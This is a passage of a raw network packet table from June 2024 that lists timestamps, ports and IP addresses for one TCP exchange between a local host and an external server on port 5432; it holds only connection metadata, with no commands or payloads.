Jun 7, 2024 17:21:17.392340899 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.392553091 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.392606020 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.392623901 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.392636061 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.392657042 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.392671108 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.392695904 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.392704010 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.392719030 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.392784119 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.393179893 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.393208981 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.393246889 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.393246889 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.393537045 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.393589973 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.393593073 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.393620968 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.393652916 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.393681049 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.393681049 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.393687963 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.393701077 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.393739939 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.394275904 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.394304991 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.394407034 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.395008087 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.395035982 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.395065069 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.395090103 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.395101070 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.395118952 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.395169973 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.395169973 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.395175934 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.395209074 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.395231009 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.395242929 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.395266056 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.395288944 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.395814896 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.395867109 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.395900965 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.395919085 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.395919085 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.396019936 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.396893978 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.396923065 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.396974087 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.396974087 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.397782087 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.397810936 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.397840977 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.397844076 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.397885084 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.397885084 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.397897005 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.397929907 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.397965908 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.398010015 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.398485899 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.398542881 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.398544073 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.398574114 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.398607016 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.398621082 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.398621082 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.398699045 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.399406910 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.399457932 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.399477005 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.399492979 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.399540901 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.399540901 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.399545908 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.399579048 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.399625063 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.399625063 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.400712013 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.400870085 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.401231050 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.401283979 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.401295900 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.401319027 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.401351929 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.401356936 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.401369095 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.401401043 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.401762009 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.401812077 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.401820898 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.401962996 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.402719021 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.402779102 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.402805090 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.402832031 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.402858973 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.402884007 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.402896881 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.402916908 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.402940989 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.402951956 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.402982950 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.402992010 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.402992010 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.403017044 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.403021097 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.403053045 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.403073072 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.403107882 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.403889894 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.403940916 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.403975010 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.403984070 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.404006004 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.404007912 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.404059887 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.404059887 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.404686928 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.404721975 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.404742002 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.404757977 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.404787064 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.404792070 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.404817104 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.404855967 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.405472994 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.405500889 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.405549049 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.405549049 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.405553102 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.405587912 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.405599117 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.405622959 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.405632973 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.405706882 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.406316996 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.406346083 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.406378031 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.406379938 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.406394958 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.406414032 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.406428099 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.406471968 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.407457113 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.407512903 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.407542944 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.407573938 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.407608032 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.407619953 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.407619953 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.407641888 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.407666922 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.407717943 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.408341885 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.408375978 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.408410072 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.408421993 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.408421993 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.408457994 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.409862041 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.409890890 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.409934044 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.409934044 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.409940958 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.409977913 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.410011053 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.410011053 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.410046101 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.410079002 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.410079002 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.410079956 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.410123110 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.410123110 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.411235094 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.411263943 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.411317110 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.411333084 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.411334038 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.411350965 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.411377907 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.411384106 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.411432981 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.411432981 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.412059069 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.412087917 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.412125111 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.412139893 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.412172079 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.412183046 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.412183046 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.412204981 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.412246943 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.412246943 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.412468910 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.412511110 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.412527084 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.412564993 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.412599087 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.412611961 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.412612915 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.412631989 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.412636995 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.412733078 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.414376974 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.414411068 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.414446115 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.414465904 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.414479971 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.414490938 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.414501905 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.414541960 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.415138006 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.415194988 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.415229082 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.415235043 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.415235043 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.415263891 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.415306091 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.415306091 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.415632010 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.415662050 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.415714025 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.415723085 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.415723085 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.415747881 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.415781021 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.415788889 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.415788889 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.415884972 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.416331053 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.416359901 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.416412115 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.416414022 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.416414022 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.416445017 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.416479111 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.416501045 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.416501045 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.416553974 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.416924953 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.416954994 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.416971922 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.416990042 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.416995049 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.417025089 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.417059898 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.417092085 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.418323994 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.418353081 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.418404102 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.418404102 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.418405056 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.418458939 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.418482065 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.418493986 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.418526888 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.418530941 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.418530941 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.418560982 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.418587923 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.418593884 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.418622017 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.418627977 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.418656111 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.418744087 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.419897079 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.419926882 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.419948101 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.419980049 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.420010090 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.420011997 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.420043945 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.420123100 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.421191931 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.421221972 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.421273947 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.421279907 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.421279907 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.421308041 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.421340942 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.421349049 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.421349049 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.421405077 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.421675920 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.421705008 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.421744108 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.421744108 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.421756983 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.421791077 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.421822071 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.421823978 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.421835899 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.421890974 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.422730923 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.422796965 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.422804117 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.422827005 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.422851086 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.422861099 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.422892094 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.422893047 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.422913074 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.422997952 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.423818111 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.423847914 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.423881054 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.423883915 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.423922062 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.423922062 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.423933983 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.423966885 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.423990965 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.424029112 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.424345016 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.424375057 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.424412012 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.424421072 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.424426079 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.424459934 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.424477100 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.424501896 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.424510002 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.424567938 CEST	49716	5432	192.168.2.5	116.202.190.18
